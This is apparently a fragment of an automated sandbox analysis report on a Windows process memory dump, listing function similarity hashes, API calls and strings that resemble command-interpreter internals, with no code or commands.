                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$CreateDeleteOpen
                                                                                                  • String ID: %s=%s$\Shell\Open\Command
                                                                                                  • API String ID: 4081037667-3301834661
                                                                                                  • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                  • Instruction ID: ccc4256d750c48dd094ab9b346a83ff16386f3306877bb05742433e2049077e4
                                                                                                  • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                  • Instruction Fuzzy Hash: EE71D762B0974282EF50AB15F4602B9E6A1FF44B82FE44179DE8E07B94DFBCD845C720
                                                                                                  APIs
                                                                                                  • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAA85
                                                                                                  • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAACF
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAAEC
                                                                                                  • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FAB39
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FAB6F
                                                                                                  • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FABA4
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FABCB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteValue$CreateOpen
                                                                                                  • String ID: %s=%s
                                                                                                  • API String ID: 1019019434-1087296587
                                                                                                  • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                  • Instruction ID: fad04ca696c137d4cc7ab6ff5ac33c0176e46f4f7bfe1f923db6f1f69e9dabe0
                                                                                                  • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                  • Instruction Fuzzy Hash: D751AA31B0879186E760AB65E45477AFBE1FB89742FA04178CE4D43B94DFB8D845CB10
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmpwcsrchr
                                                                                                  • String ID: COPYCMD
                                                                                                  • API String ID: 2429825313-3727491224
                                                                                                  • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                  • Instruction ID: b4e5a07742cb1dbaa6c7fe22f2cf61b388d2a572d9396e0ce1e72b2aee086b19
                                                                                                  • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                  • Instruction Fuzzy Hash: EEF1C432F0860286FB61AF55A0641BDB6F1BB0479AFA04179DE5D23ED8DFBCA444C760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$FullNamePathwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 4289998964-0
                                                                                                  • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                  • Instruction ID: 60d368dba8c772bdf9a909bcffed1c61ed65b43792e3b2ea40dc821befecb567
                                                                                                  • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                  • Instruction Fuzzy Hash: 6BC1F615B09346C2EE94BB51B168378A3A0FB54B92FA05579CE0E17FD0DFBCA895C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 3476366620-0
                                                                                                  • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                  • Instruction ID: 2e3c01122cf87f04778fb62425937eed62cd2e16eb7f3f031643a1dd1a932219
                                                                                                  • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                  • Instruction Fuzzy Hash: 2A21746190854392EA547B11E4252B8EB51FF49717FE0427AD41E036E1DFBCA848C331
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 4104442557-0
                                                                                                  • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                  • Instruction ID: 4274f12c5ddd4d123d8019617cbabd49339a9579317d70ea70936df20e286bc3
                                                                                                  • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                  • Instruction Fuzzy Hash: 0E119322A04F418AEB40EF71E8442A877A4FB09759F900A34EA6D47B54DFBCD9A4C360
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                  • String ID: %9d
                                                                                                  • API String ID: 1006866328-2241623522
                                                                                                  • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                  • Instruction ID: 8adb73c3756b22813a21425d74b78fedd7a590b27422a0c7a0cd13fe9fa6f506
                                                                                                  • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                  • Instruction Fuzzy Hash: A3518572A046428AF700EF11E8541A8BBB4FB44795FA04679DA6D53BD1CFBCE944CB70
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                  • Instruction ID: c3bc9d88d45c99667406db6df24adc5ee22c857c56fdbcb05505f5d129fb1c0d
                                                                                                  • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                  • Instruction Fuzzy Hash: 7EC14762A0878296EB61EB20E864AF9A3A4FF94745FA44179DA0D07FD0DF7CE545C320
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                  • Instruction ID: 1ce39be5f352f93f2856085d01a7f4bde01f541d0a5b31d07bdb68cb88a58b70
                                                                                                  • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                  • Instruction Fuzzy Hash: 65A1E525B1865291EB50BB25E4646B9F6A1FF88B82FE04179DD4E43F90DFBCE405C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DiskFreeSpace
                                                                                                  • String ID: %5lu
                                                                                                  • API String ID: 2448137811-2100233843
                                                                                                  • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                  • Instruction ID: 0afc16e2bfb4d411225d278d638f57aff3b26d6d70b1309a27d0be1a8d754725
                                                                                                  • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                  • Instruction Fuzzy Hash: B141C436708AC195EB61EF11E8546EAB760FB84789F908035EE4D0BB98DFBCD549C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: GeToken: (%x) '%s'
                                                                                                  • API String ID: 2081463915-1994581435
                                                                                                  • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                  • Instruction ID: 18b1c8fa55a4f892dffea254e978dc236638678f373097f12f121675db383e6a
                                                                                                  • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                  • Instruction Fuzzy Hash: C0718C21E0C25685FB64BB25A8682B5BAA0FF00782FF40579D50D43AE1DFFCE885C630
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1497570035-0
                                                                                                  • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                  • Instruction ID: ee1773b877ea09041f00142a83d15ae997d923350cb750501ebb92388101b46a
                                                                                                  • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                  • Instruction Fuzzy Hash: 78C15665B0824292EA50BB11E4602B9F3A1FF84792FA44179DA4E43FD5DFBCF846C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                  • Instruction ID: dc618904f642cb68a7a720ccaf9cb32d50de70c15597768ffb1a341704506d04
                                                                                                  • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                  • Instruction Fuzzy Hash: D2A15B11B18A4251EE54BF65A434179E690BF54FE2FE44239EE6E47BC4EE7CE841C320
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • _pipe.MSVCRT ref: 00007FF7823D6C1E
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823D6CD1
                                                                                                  • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823D6CFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 624391571-0
                                                                                                  • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                  • Instruction ID: d9373a59a79bad110829270ca72687f65e2e9aaa7cf678b5a01f8779df87f887
                                                                                                  • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                  • Instruction Fuzzy Hash: F271BF71A0860286E704BF35E864178B6A2FF84756BB48278EA1D577D5CF7CE852CB30
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 4268342597-0
                                                                                                  • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                  • Instruction ID: 064861aaf8c905b79d5fd2754d0b69a92cb0546e1f77a69751abe4b84fd3f35e
                                                                                                  • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                  • Instruction Fuzzy Hash: CA816432A08B8281EF54AF26A450239B7A0FF55B86FA45179CD5D03B55DFBCE980CB70
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenToken$CloseProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2991381754-0
                                                                                                  • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                  • Instruction ID: 04c74025961ada6152f3c40a18d25edd51bf312746372050b3e385179ac18c64
                                                                                                  • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                  • Instruction Fuzzy Hash: D9219E36E0874297E740AB50D4542BDFB60FB957A2FA04179EB5943A94DFBCE848CB10
                                                                                                  APIs
                                                                                                  • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7823FC59E), ref: 00007FF7823D5879
                                                                                                    • Part of subcall function 00007FF7823D58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5903
